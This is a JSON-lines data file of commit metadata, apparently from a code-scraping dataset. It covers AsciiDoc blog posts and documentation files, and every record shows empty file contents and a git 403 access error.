{"commit":"367fe556246c158786cdc964549c5f23f6e2d071","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c5567a66d97e4760deee2cbea2927e074be8647","subject":"Update 2018-03-27-Mah-Rocks.adoc","message":"Update 2018-03-27-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2018-03-27-Mah-Rocks.adoc","new_file":"_posts\/2018-03-27-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1e591da1b2b3836c4ea7400d8a804910a2f12d4","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd22bf479b2b952b24eaa698b0ef8b0020e54ef2","subject":"Update ipython_setup.adoc","message":"Update ipython_setup.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_setup.adoc","new_file":"docs\/ipython_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e9ae0e068564688002622d0f1d3f0f63832b374","subject":"Update 2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","message":"Update 2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_file":"_posts\/2015-12-03-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea167fd142a8f2533aeef46f557489c94955e63","subject":"Update 2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","message":"Update 2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","new_file":"_posts\/2017-06-07-Setting-up-LDAP-on-Tomcat8-using-JNDI-Ralm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e52e2a47107243f5d0ffd6754da8f11ffc1b6dbb","subject":"Add video link to APM\/zipkin\/MSA blog post (#229)","message":"Add video link to APM\/zipkin\/MSA blog post (#229)\n\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/09\/19\/hawkular-apm-on-msa.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/09\/19\/hawkular-apm-on-msa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c91bc643ae20afd58028bf68f25b003cbe339dc7","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfd4484f5bbd33e08fe6c701f5045062137177f0","subject":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","message":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceb5db8ba85573052624389f84632aa4897b1126","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a910f5efc4be8ec9bfc41611a498fe667ae1c1fc","subject":"Add instructions for testing","message":"Add instructions for testing\n","repos":"EvidentSolutions\/apina,EvidentSolutions\/apina,EvidentSolutions\/apina","old_file":"docs\/testing.adoc","new_file":"docs\/testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EvidentSolutions\/apina.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7321716baa282249dc35525e3794995d41cebe8","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33770b58cdf30b0396cf56ba6e2b3c8041af009b","subject":"Add Arduino directories","message":"Add Arduino directories\n","repos":"ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan","old_file":"Arduino\/sketches\/readme.adoc","new_file":"Arduino\/sketches\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/robo_magellan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa87af5798a90fdb03e4117c8cfbdd830a3ef703","subject":"Update 2016-05-12-Hello.adoc","message":"Update 2016-05-12-Hello.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-12-Hello.adoc","new_file":"_posts\/2016-05-12-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c45444f66fcefe0ff4ef68dd2682249e1f2c433","subject":"Update 2016-11-09-Prova.adoc","message":"Update 2016-11-09-Prova.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-09-Prova.adoc","new_file":"_posts\/2016-11-09-Prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7047c97662f320f85c0a2a000cfe9d698c1eeeb7","subject":"Update 2016-12-06-Tytul.adoc","message":"Update 2016-12-06-Tytul.adoc","repos":"tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io","old_file":"_posts\/2016-12-06-Tytul.adoc","new_file":"_posts\/2016-12-06-Tytul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tr00per\/tr00per.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea7c4845c37078a013b9f8411d505aaa36f6650","subject":"Update 2016-07-17-Chat2.adoc","message":"Update 2016-07-17-Chat2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-17-Chat2.adoc","new_file":"_posts\/2016-07-17-Chat2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"925b58218f6d913b23da277ade30d047607a168a","subject":"y2b create post Awesome YouTube Mod!","message":"y2b create post Awesome YouTube Mod!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-29-Awesome-YouTube-Mod.adoc","new_file":"_posts\/2012-12-29-Awesome-YouTube-Mod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24be72b7005741ea27fe3adc56bf46083fbe9879","subject":"Update 2016-01-24-the-python-tutorial.adoc","message":"Update 2016-01-24-the-python-tutorial.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-24-the-python-tutorial.adoc","new_file":"_posts\/2016-01-24-the-python-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"827d1a6ce44f4e9351ac9c32104a4962025900e3","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc69ac3f1c4e9032a00ce094e2c83857b7a38481","subject":"tested Java 9 chapter, added clarifications","message":"tested Java 9 chapter, added clarifications\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7eb63af3d29078363e3ea1cf6c116734199fe73","subject":"Update 2018-05-12-The-First-Invitational.adoc","message":"Update 2018-05-12-The-First-Invitational.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2018-05-12-The-First-Invitational.adoc","new_file":"_posts\/2018-05-12-The-First-Invitational.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9e051e50c095532dcb68c0fb0659b3fc0340fc","subject":"Added a recipe for counting number of lines in a dataset","message":"Added a recipe for counting number of lines in a dataset\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"04_model\/counting_number_of_lines.asciidoc","new_file":"04_model\/counting_number_of_lines.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91ec1ec3a3b037d7245b7449473981ac5eb51404","subject":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","message":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf420e0732a7f27c80c5bb652197a9e3b9f375c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aebfd7781e860e94d4031e30581460808d54c79c","subject":"Update 2011-02-18-I-remember-thinking.adoc","message":"Update 2011-02-18-I-remember-thinking.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-02-18-I-remember-thinking.adoc","new_file":"_posts\/2011-02-18-I-remember-thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e01e85a6808c68a5766784a6955e277aed6bb23","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ac0ca08a2ac06d8dad97e30896dbf16b0348e71","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e2bae1b29eba2ff72cec61fd80e9959caa7562a","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f64cfa3cdf582050d401262ca5f9b27e129826","subject":"Update 2017-07-17-just-doin-some-stuff.adoc","message":"Update 2017-07-17-just-doin-some-stuff.adoc","repos":"iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site","old_file":"_posts\/2017-07-17-just-doin-some-stuff.adoc","new_file":"_posts\/2017-07-17-just-doin-some-stuff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iwakuralai-n\/badgame-site.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01fb544d28437406b7fb914b11c3c2d270d44eee","subject":"CL note: getting current file","message":"CL note: getting current file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5c360c7d417c27c72db29cb3d3427fa5cfa8fb1c","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b766e0a5b058064a2fd962ec13641b85658b21fe","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73a213c87b2b44d3a97353c097d2cdf11fbda968","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbcddab9c9b03140d944d701f78fd8f21c3e117b","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d315f5b796a07907c322b6964949b5e2d22d72","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0c616b0e9026362700a0c055b210ca0a1275d84","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d74851bc755a40be091a5d004f850ed3a4843e9c","subject":"Deading branching3","message":"Deading branching3\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 3.adoc","new_file":"Git\/Git branching 3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79e09156f625043ccc6655157186807ef918f01a","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1501e84e279617e04980dfa023ab0010a196ac6","subject":"making the link relative","message":"making the link relative\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"978d1ed2575d622cb5055f6fa7fbe845ce58572c","subject":"[Docs] Improve tuning for speed advice (#33315)","message":"[Docs] Improve tuning for speed advice (#33315)\n\nThis change merges two sections in the \"Tune for search speed\" documentation\r\nthat recommend mapping numeric identifiers as keywords. Both sections contain\r\nmostly the same advice, so they can be merged.\r\n\r\nCloses #32733","repos":"robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/how-to\/search-speed.asciidoc","new_file":"docs\/reference\/how-to\/search-speed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5d493c96eb8e168e05180a82cdef72a485d8f2a","subject":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e41924f3f46a3de5dca274d03c868a992ac66d","subject":"Update 2014-09-17-We-need-a-new-filter.adoc","message":"Update 2014-09-17-We-need-a-new-filter.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-17-We-need-a-new-filter.adoc","new_file":"_posts\/2014-09-17-We-need-a-new-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fda2970e3420d85ae9b848a76942597baa5ad3c","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 